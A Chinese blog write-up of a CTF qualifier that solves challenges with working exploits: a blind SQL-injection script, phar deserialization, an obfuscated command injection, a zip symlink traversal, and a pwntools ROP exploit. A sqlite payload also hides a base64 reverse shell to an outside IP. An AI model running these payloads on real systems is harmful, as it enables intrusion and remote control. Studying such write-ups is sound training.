第五空间CTF初赛WriteUp By EDISEC

最新推荐文章于 2022-10-29 19:51:28 发布
最新推荐文章于 2022-10-29 19:51:28 发布
阅读量1.4k 收藏
点赞数
分类专栏: CTF-Writeup 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45603443/article/details/127049782
版权

第五空间CTF初赛WriteUp By EDISEC

Web

5_web_Eeeeasy_SQL

过滤了挺多字符,fuzz发现语句报错后是不会回显的,正常执⾏有回显 构造⼀个报错注⼊,if被过滤使⽤case when,空格⽤换⾏替换

or (case when (1>0) then 1 else (~0+1) end)#

可以构造盲注了,但select被过滤,多次尝试后发现table查询没有报错,应该是mysql8,可以尝试table盲注,单 引号过滤⽤16进制替代

(0x646566,0x70,null,4,5,6)<(table information_schema.schemata limit 2,1)

测试可⽤,构造脚本开跑,脚本问题跑出来的数据最后⼀位偏差1,懒得跑⻓度⼿动kill

import binascii
import requests
def s2h(str):
str1=str.encode()
return "0x"+binascii.hexlify(str1).decode()
url="http://39.107.75.148:59778/api/api.php?command=login"
str='!#()0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
str2=''.join(reversed(str))
tmp=""
while True:
for i in str2:
# sql="or\n(case\nwhen\n((0x646566,{},null,4,5,6)
<(table\n`information_schema`.`schemata`\nlimit\n1))\nthen\n1\nelse\n(~0+1)\nend)#".for
mat(s2h(tmp+i))
# sql="or\n(case\nwhen\n((0x646566,0x637466,
{},null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
<(table\n`information_schema`.`tables`\nlimit\n328,1))\nthen\n1\nelse\n(~0+1)\nend)#".f
ormat(s2h(tmp+i))
sql="or\n(case\nwhen\n((1,0x61646d696e40363636,binary\n{},null)
<(table\nusers\nlimit\n1))\nthen\n1\nelse\n(~0+1)\nend)#".format(s2h(tmp+i))
data={
"username": "admin\\",
"password": sql
 }
r=requests.post(url,data=data,allow_redirects=False)
if 'success' in r.text:
tmp=tmp+i
print(tmp)
break

登陆后去/api/flag.php 有个^ 直接///过了
在这里插入图片描述
file=///flag

5_web_BaliYun

<?php
class upload{
function __construct()
{
$this->filename = "/flag";
 }
}
 //php -d 'phar.readonly=0' exp.php
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new upload();
$o->data='hello L1n!';
$phar->setMetadata($o); //将⾃定义的meta-data存⼊manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的⽂件
//签名⾃动计算
$phar->s

在这里插入图片描述

5_easylogin

POST /login.php HTTP/1.1
Host: 39.105.13.61:10808
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://39.105.13.61:10808
Connection: close
Referer: http://39.105.13.61:10808/login.php
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
username=admin%df'
uniunionon
seunionlect
1,2,0x3062313830303738643939346362326235656438396437636538653765656132%23&password=su

在这里插入图片描述

5_web_letmeguess_1

POST /index.php?ip=%0abash${IFS}${PATH%%u*}tm?${PATH%%u*}php* HTTP/1.1
Host: 39.106.156.96:26460
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://39.106.156.96:26460/index.php?ip=1%7Cid
Cookie: PHPSESSID=9o2g67rb6j486vj0cg8suse2ae; username=admin;
code=4d1ff0386c1933bcb68ad517a6573d1e
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryySxaPMAMEUMtrk15
Content-Length: 167
------WebKitFormBoundaryySxaPMAMEUMtrk15
Content-Disposition: form-data; name="file";filename="1"
cat kylin/flag.txt
------WebKitFormBoundaryySxaPMAMEUMtrk15--

Misc

sakana_reveage

$ nc 39.107.76.202 19386
1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit
Input your choice
>> 1
Name for your sakana:../../../../.././../../../../../tmp/sakanas.zip.zip
Base64-encoded
sakana:c2FrYW5hc2FrYW5hc2FrYW5hClBLAwQKAAAAAADtbjNVTnsDdQUAAAAFAAAAFAAcAHN5bWxpbmtfdG9f
ZmxhZy5saW5rVVQJAANNBChjTQQoY3V4CwABBPUBAAAEAAAAAC9mbGFnUEsBAh4DCgAAAAAA7W4zVU57A3UFAAA
ABQAAABQAGAAAAAAAAAAAAO2hAAAAAHN5bWxpbmtfdG9fZmxhZy5saW5rVVQFAANNBChjdXgLAAEE9QEAAAQAAA
AAUEsFBgAAAAABAAEAWgAAAFMAAAAAAA==
1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit
Input your choice
>> 4
Base64-encoded zip of sakanas:a
Error base64!
[/tmp/sakanas.zip]
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
warning [/tmp/sakanas.zip.zip]: 19 extra bytes at beginning or within zipfile
 (attempting to process anyway)
Zip successfully uploaded and extracted
1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit
Input your choice
>> 2
0 -> symlink_to_flag.link
Select num which sakana to download
>> 0
Here is your sakana file(base64ed)
ZmxhZ3s2U0FVdDJ1VzV2blNKTjZ1VHhhMkpNWVdnUUNhSEZIVn0=
1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit
Input your choice
>>

在这里插入图片描述

5_Misc_m@sTeR_0f

select readfile('/etc/passwd')
select writefile('/home/ctf/'||(SELECT substr(sqlite_version(),2,1))||'sqliterc',
(SELECT substr(sqlite_version(),2,1)||'shell echo
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuMjYuNTkuMTM3Lzg4ODggMD4mMQo=|base64 -d|bash'))

在这里插入图片描述

5_简单的Base

在这里插入图片描述

Re

5_re2

mips架构的逆向题⽬,使⽤ghidra逆向,⼀眼迷宫,跟进find函数,发现是⼀个15*15 的迷宫,在menu函数⾥初 始化了level为0 当level为2的时候break,说明迷宫有三层
在这里插入图片描述
在这里插入图片描述
在ida⾥导出地图数据
在这里插入图片描述
写个脚本 得到三个迷宫

#include <stdio.h>
int map[676] = {
0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000001,
0x00000001, 0x00000000, 0x00000003, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000,
0x00000001,
0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001,
0x00000001,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000001,
0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000000,
0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000000,
0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000,
0x00000001,
0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000000,
0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001,
0x00000000,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000004, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000003,
0x00000001,
0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000001,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000001,
0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000000,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000004, 0x00000000,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000001,
0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000003, 0x00000001, 0x00000001, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000001, 0x00000001,
0x00000001,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001,
0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000,
0x00000000, 0x00000004, 0x00000000, 0x00000000
};
int map1[15][15] ;
int map2[15][15] ;
int map3[15][15] ;
void debug1(){
 for(int i = 0;i<=14;i++){
 for(int j = 0;j<=14;j++){
 printf("%d ",map1[i][j]);
 }
 printf("\n");
 }
}
void debug2(){
 for(int i = 0;i<=14;i++){
 for(int j = 0;j<=14;j++){
 printf("%d ",map2[i][j]);
 }
 printf("\n");
 }
}
void debug3(){
 for(int i = 0;i<=14;i++){
 for(int j = 0;j<=14;j++){
 printf("%d ",map3[i][j]);
}
 printf("\n");
 }
}
int main(){
 for(int i = 0;i<=14;i++){
 for(int j = 0;j<=14;j++){
 map1[i][j] = map[i * 15 + j];
 }
 }
 for(int i = 0;i<=14;i++){
 for(int j = 0;j<=14;j++){
 map2[i][j] = map[0xe1 + i * 15 + j];
 }
 }
 for(int i = 0;i<=14;i++){
 for(int j = 0;j<=14;j++){
 map3[i][j] = map[0xe1 + 0xe1 + i * 15 + j];
 }
 }
 debug1();
 printf("\n\n\n\n\n");
 debug2();
 printf("\n\n\n\n\n");
 debug3();
 return 0;
}

在这里插入图片描述
⾛迷宫得到路径

dddddssdsdddsssaassssdddsdddsssdddsssdssddssddwddssssssdddssssdddss

在这里插入图片描述

Pwn

5_1H3ll0Rop

#coding:utf-8
from pwn import *
context.log_level='debug'
elfelf='./H3ll0Rop'
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
 '''
if len(sys.argv)==1 :
 io=process(elfelf)
 gdb_open=1
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' :
 io=process(elfelf)
 gdb_open=0
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
 io=remote('39.106.158.47',51245)
 gdb_open=0
 libc=ELF('./libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):
 if gdb_open==1 :
 gdb.attach(io,a)
padding='a'*0x68
pay=padding+p64(0x400753)+p64(elf.got['puts'])+p64(elf.plt['puts'])
pay+=p64(0x400560)
io.recv()
io.send(pay)
libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
padding='a'*0x68
pay=padding+p64(0x400753)+p64(bin_sh_addr)+p64(system_addr)
pay+=p64(0x400560)
io.recv()
io.send(pay)
success('libc_base:'+hex(libc_base))
## success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)
io.interactive()

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)
有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等)

EDI安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-writeup
03-19
CTF-writeup
阿里云ctf比赛writeup
04-26
阿里云ctf比赛writeup ,包含web,misc,pwn,reverse,crypto.
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
神来之笔,2021CTF内核漏洞精选解析
kali_Ma的博客
07-13 596
CTF解析0x0 保护0x1 源码分析0x2 漏洞点0x3 利用思路0x4 Exploit 0x0 保护 #!/bin/sh qemu-system-x86_64 \ -m 512M \ -kernel bzImage \ -nographic \ -smp 1 \ -cpu kvm64,+smep,+smap \ -append "console=ttyS0 quiet kaslr" \ -initrd rootfs.cpio \ -mo
2022年第五空间网络安全大赛WriteUp
渗透测试研究中心
09-22 6671
一、WEB1.web_BaliYun进去之后一个文件上传,而且只能上传图片。访问www.zip拿到源码网站源码:index.php:<?phpinclude("class.php");if(isset($_GET['img_name'])){$down=newcheck_img();#hereecho$down->img_check();}if(isset...
第五空间Writeup_Web
Lethe's Blog
09-03 1091
空相 (1)进入页面,提示了参数id (2)尝试一下:?id=1‘ (3)
高校战“疫”网络安全分享赛
辰星的博客
03-09 2767
2020疫情期间高校战“疫”网络安全分享赛,个人做出的部分WP。不足之处见谅。 MISC 简单MISC 提示为简单隐写术。附件中一张jpg图片和一个名为flag.zip的加密压缩包,很明显是让我们利用jpg获得密码解压压缩包。 我们猜测这个图片中可能存在.txt文件保存密码,16进制查看器中查看下验证猜想。 在kali中利用binwalk分离出来,并查看 得到莫尔斯码,解码得到密码,解码压缩...
BCTF2018-houseofatum-write-题解
z2876563的博客
10-10 324
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些简单
2022第五空间WEB&MISC
羽的博客
09-19 2159
CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
第五空间writeup-str4nge
wyj_1216 House
08-28 1323
web 空相 进入后: 尝试:id = 1 再次尝试:id = 1 and 1 = 1 尝试读取上面的php文件:25d99be830ad95b02f6f82235c8edcf7.php 发现token 于是: http://111.33.164.4:10001/25d99be830ad95b02f6f82235c8edcf7.php?token=1DJBAAA03PNLD02GJ2S1M...
记一次CTF过程(Writeup)
热门推荐
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
ctf.show命令执行(web29-web124)
wanan的博客
08-31 3083
ctf.show命令执行(web29-web124)
第五空间ctf2020pwn-twice
qq_36495104的博客
06-25 613
checsec ida main函数 int __cdecl main(int argc, const char **argv, const char **envp) { for ( nCount = InitData(); (unsigned int)sub_4007A9(nCount); ++nCount ) ; return 0; } sub_4007A9函数 // a1=ncount __int64 __fastcall sub_4007A9(int a1) { unsign
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
CTF---Web---SQL注入---06---tables关键字替换
qq_22160557的博客
07-31 459
文章目录前言一、题目描述二、解题步骤1.2.3.三、总结 前言 题目分类: CTFWeb—SQL注入—0 一、题目描述 题目:新闻搜索 二、解题步骤 1. 2. 3. 三、总结 1、 参考链接:
2022第五空间网络安全大赛
Pysnow's Blog
09-19 1812
2022第五空间网络安全大赛
攻防世界-reverse_re3
qq_70851535的博客
10-29 2246
逆向题目分析
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值